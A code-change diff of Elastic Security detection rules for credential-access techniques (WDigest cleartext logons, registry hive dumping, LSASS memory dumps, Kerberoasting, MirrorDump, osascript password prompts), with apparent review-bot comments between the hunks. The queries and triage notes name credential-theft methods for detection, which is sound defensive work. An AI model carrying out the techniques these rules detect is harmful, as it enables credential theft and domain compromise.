This activity is\ncommonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should\ntreat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the entire domain to credential compromises and\nconsequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type : (\"creation\", \"change\") and\n registry.path :\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", "references": [ "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", "https://frsecure.com/compromised-credentials-response-playbook" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -55,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json index f75b18ce71268..be78a1108773e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_moving_registry_hive_via_smb.json 
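Review bot: The new exclusion in `query`, `not (process.executable : "?:\\Windows\\System32\\svchost.exe" and user.id : "S-1-5-18")`, is keyed only on the writer's path and SID, which is also the context of any service hosted in a SYSTEM `svchost.exe`, so a write to `UseLogonCredential` from that context is no longer detected at all; the rewritten `note` says nothing about this, and the `### False positive analysis` section still states that the modification "should not happen legitimately", which the exclusion now contradicts. A line under that heading such as `- Modifications made by svchost.exe running as SYSTEM are excluded from the query; if coverage of that path is required in your environment, clone the rule without the exclusion.` would record the trade-off for analysts. The `### Related rules` line still cites `Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46`, although that rule is named `Potential Invoke-Mimikatz PowerShell Script` elsewhere in this commit. The two-version bump from 4 to 6 is presumably intentional given both the query and the note changed, but the PR description should confirm it.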
@@ -12,6 +12,33 @@ "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the\ncase for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not\nmonitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive\nfile on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of\nactivity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "file where event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : \"s-1-5-21*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494", "severity": "medium", @@ -71,5 +98,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json index f5449e4e30a1c..db5fac7d13473 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_okta_brute_force_or_password_spraying.json
@@ -13,14 +13,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Okta Brute Force or Password Spraying Attack",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.category:authentication and event.outcome:failure\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "42bf698b-4738-445b-8231-c834ddefd8a0",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -54,5 +78,5 @@
 "value": 25
 },
 "type": "threshold",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json
index 110b790de887d..23fdfa5d7b8f0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json
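Review bot: The new side sets `"note": ""` in place of the removed Config section, which leaves the rule with an empty investigation guide instead of no guide; if no triage content replaces it, drop the `note` key rather than shipping an empty string, and the same emptied-note pattern recurs in other rule files in this diff. The added `related_integrations` entry pins `"version": "1.3.0"` with no range operator — if the rest of the rule set expresses this as a semver range such as `^1.3.0`, this file should follow that convention; worth checking against the schema before merge. The requirement text itself survives verbatim in the new `setup` field, so nothing operator-facing is lost.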
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json
@@ -18,6 +18,23 @@
 "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "registry.data.strings",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "registry.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "54c3d186-0461-4dc3-9b33-2dc5c7473936",
 "severity": "medium",
@@ -63,5 +80,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json
index 3330846bfc6c5..82c6e31ec1f1c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json
@@ -14,15 +14,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell MiniDump Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other\nprivileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false\npositives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage 
outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other\nprivileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false\npositives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.category:process and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM)\n", "references": [ "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1", "https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -79,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } 
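Review bot: The new `setup` string carries a typo that the old note also had — `Steps to implement the logging policy with with Advanced Audit Configuration:` — drop the doubled `with`. More importantly, the setup only says the Script Block Logging policy must be enabled, while the query depends on `powershell.file.script_block_text`, which the new `required_fields` records as `ecs: false`/`type: unknown`; enabling the policy presumably only makes Windows write the script-block events to the PowerShell Operational log, and those still have to be shipped for the field to exist at all, so the rule fails silently if that step is skipped. I would add a sentence along the lines of `The PowerShell Operational event log must also be collected from the host (for example through the Windows integration) for this field to be populated.` to the setup text, after confirming the exact data stream name against the integration.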
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json
index e0171ca436aef..7eede3ada2193 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json
@@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Kerberos Ticket Request", - "note": "## Triage and analysis\n\n### Investigating Explicit PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute\nforce to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to\nperform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\nrelated to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request\nKerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password\nrequirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. 
Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n )\n", + "note": "## Triage and analysis\n\n### Investigating Explicit PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute\nforce to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to\nperform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain 
(parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\nrelated to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request\nKerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password\nrequirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. 
Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n )\n", "references": [ "https://cobalt.io/blog/kerberoast-attack-techniques", "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -80,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json index d6fd9ba869b29..4278104e8d650 100644 
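Review bot: The GPO path quoted in the new `setup` string — `Computer Configuration > Administrative Templates > Windows PowerShell > Turn on PowerShell Script Block Logging (Enable)` — appears to skip the `Windows Components` node that the Windows PowerShell template sits under in the Administrative Templates tree, so an operator following it verbatim may not find the setting; please verify against a current gpedit and, if confirmed, insert `Windows Components >` between `Administrative Templates >` and `Windows PowerShell >`. The same string also repeats the `with with` typo in `Steps to implement the logging policy with with Advanced Audit Configuration:`. Both are inherited from the removed note, but this hunk rewrites the text, so it is the place to fix them.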
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json
@@ -11,13 +11,36 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Credential Access via DuplicateHandle in LSASS",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.code == \"10\" and \n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n",
+ "note": "",
+ "query": "process where event.code == \"10\" and\n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n",
 "references": [
 "https://github.com/CCob/MirrorDump"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.CallTrace",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.GrantedAccess",
+ "type": "unknown"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
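Review bot: The new `setup` text covers only the `event.ingested` fallback, yet the query requires `event.code == "10"` together with `winlog.event_data.GrantedAccess` and `winlog.event_data.CallTrace`, which the new `required_fields` entries record as `ecs: false`/`type: unknown`; without the producer of those fields (presumably Sysmon ProcessAccess, Event ID 10, with its CallTrace) the rule simply never fires and nothing in the rule tells the operator why. I would prepend a sentence such as `This rule requires Sysmon ProcessAccess (Event ID 10) events, including the CallTrace field, to be collected from Windows hosts.` to the setup string, after confirming the event source the rule was authored against. The `"note": ""` on the new side also leaves an empty investigation guide; drop the key if no triage content replaces it.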
@@ -52,5 +75,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json
index 4f945e22abdb3..a3aea71fa5fe7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json
@@ -15,6 +15,28 @@
 "references": [
 "https://themittenmac.com/detecting-ssh-activity-via-process-monitoring/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "ace1e989-a541-44df-93a8-a8b0591b63c0",
 "severity": "medium",
@@ -49,5 +71,5 @@
 "value": 20
 },
 "type": "threshold",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json
index 31b08204b6e8e..0931671c036ed 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json
@@ -11,14 +11,32 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Prompt for Credentials with OSASCRIPT",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*display dialog*password*\"\n",
 "references": [
 "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/prompt.py",
 "https://ss64.com/osx/osascript.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
